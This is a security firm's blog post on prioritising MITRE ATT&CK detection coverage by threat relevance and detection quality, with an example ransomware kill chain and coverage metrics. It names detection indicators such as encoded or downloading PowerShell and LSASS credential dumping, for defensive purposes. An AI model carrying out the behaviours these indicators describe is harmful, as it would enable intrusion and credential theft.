Back to blog
mitre attack
detection engineering
threat modeling
strategy

MITRE ATT&CK Detection Coverage: Quality Over Quantity

September 18, 2024
Covenda Engineering Team

"We need 100% MITRE ATT&CK coverage" is the new "we need zero vulnerabilities." It sounds great in a board presentation, but it's the wrong goal.

Here's why, and what you should measure instead.

The coverage trap

MITRE ATT&CK has 196 techniques (as of v14). Building a high-fidelity detection for each one would require:

  • ~400-600 detection rules (accounting for sub-techniques)
  • ~1,000 test cases (true positives and false positives)
  • ~50,000 lines of documentation
  • Ongoing maintenance as ATT&CK evolves twice a year

And here's the kicker: most of those techniques don't apply to your environment.

Are you running ICS/SCADA systems? If not, you don't need detections for Modbus or DNP3 protocols. Do you have iOS devices in your SOC's scope? If not, you can skip 30+ mobile techniques.

Start with realistic threat scenarios

Instead of treating ATT&CK as a checklist, use it as a framework to map realistic threats:

Step 1: Identify your adversaries

Who actually targets organizations like yours?

  • Ransomware gangs (everyone)
  • Nation-state APTs (if you're critical infrastructure, defense, or high-value IP)
  • Insiders (financial services, healthcare)
  • Opportunistic attackers (exposed infrastructure)

Step 2: Map their typical kill chains

What techniques do they commonly use?

Example: Ransomware kill chain

Initial Access → T1566.001 (Phishing: Attachment)
Execution → T1059.001 (PowerShell)
Persistence → T1547.001 (Registry Run Keys)
Privilege Escalation → T1055 (Process Injection)
Defense Evasion → T1562.001 (Disable AV)
Lateral Movement → T1021.001 (RDP)
Impact → T1486 (Data Encrypted for Impact)

That's 7 techniques. Build high-fidelity detections for these before worrying about obscure nation-state techniques.

Step 3: Layer your detections

Don't rely on a single detection per technique. Build multiple layers:

Example: Detecting T1059.001 (PowerShell abuse)

  • Layer 1: PowerShell with suspicious flags (-EncodedCommand, -NoProfile)
  • Layer 2: PowerShell spawned by unusual parent processes (e.g., Excel, Outlook)
  • Layer 3: PowerShell making external network connections
  • Layer 4: PowerShell downloading files from internet

Multiple layers = higher chance of detection, even if attacker evades one layer.

Prioritize "must-detect" techniques

Not all techniques are equally important. Categorize by:

Critical (must detect)

  • Initial Access (phishing, exploit public-facing apps)
  • Credential Access (dumping LSASS, password spraying)
  • Lateral Movement (RDP, PsExec, WMI)
  • Impact (ransomware, data destruction)

These are high-signal, high-impact techniques. False positives are acceptable if it means catching these.

Important (should detect)

  • Execution (suspicious scripting, macro execution)
  • Persistence (scheduled tasks, startup items)
  • Defense Evasion (clearing logs, disabling AV)

These indicate active compromise. Invest in tuning to reduce false positives.

Nice-to-have (can wait)

  • Discovery (network scans, user enumeration)
  • Collection (screen capture, clipboard data)
  • Exfiltration (unusual outbound traffic)

These are often noisy and context-dependent. Build detections after covering the critical techniques.

Measure quality, not just coverage

Instead of "% of ATT&CK techniques covered," track:

Detection depth

How many layers of detection do you have per critical technique?

  • Goal: 3+ layers for critical techniques
  • Goal: 2+ layers for important techniques

True positive rate

What % of your alerts represent real threats?

  • Goal: >80% TP rate for critical techniques
  • Goal: >50% TP rate for important techniques

Validation cadence

How often do you test your detections?

  • Goal: Red team exercises quarterly
  • Goal: Purple team detection validation monthly
  • Goal: Continuous testing via attack simulation tools

Tools for tracking coverage

Open-source options

  • ATT&CK Navigator: Visualize your coverage as a heatmap
  • DeTT&CT: Score detection quality, not just presence
  • Atomic Red Team: Run real attacks to validate detections

Commercial options

  • AttackIQ: Continuous security validation
  • SafeBreach: Automated breach simulation
  • Cymulate: Full kill chain simulation

We typically start clients with ATT&CK Navigator + Atomic Red Team (free) before investing in commercial tools.

Real-world coverage example

Here's what realistic coverage looks like for a mid-sized fintech:

Total ATT&CK techniques: 196 Relevant to environment: 82 (42%) Covered with high-fidelity detections: 45 (55% of relevant) Coverage breakdown:

  • Critical techniques: 28/28 (100%)
  • Important techniques: 12/34 (35%)
  • Nice-to-have techniques: 5/20 (25%)

This organization has ~23% overall ATT&CK coverage but 100% coverage of techniques that matter. That's a win.

When "low coverage" is actually fine

Some techniques are better prevented than detected:

  • T1078 (Valid Accounts): Use MFA and least privilege instead of trying to detect legitimate-looking logins
  • T1071 (Application Layer Protocol): Block C2 domains at the firewall instead of trying to detect beaconing in logs
  • T1027 (Obfuscated Files): Use application allowlisting instead of trying to detect every obfuscation technique

Don't build detections just to increase coverage. Focus on techniques where detection is your best defense.

Conclusion

Aim for 100% coverage of relevant, high-priority techniques - not 100% coverage of ATT&CK. Your analysts will thank you, and you'll actually catch the threats that matter.

Start with threat modeling, prioritize realistically, and measure detection quality over quantity.

Want help building a threat-informed detection program? Contact us to discuss how our Forward-Deployed Engineers can help.

Need help with security engineering?

Our Forward-Deployed Engineers can help you build and operate world-class security programs.

Contact UsView Services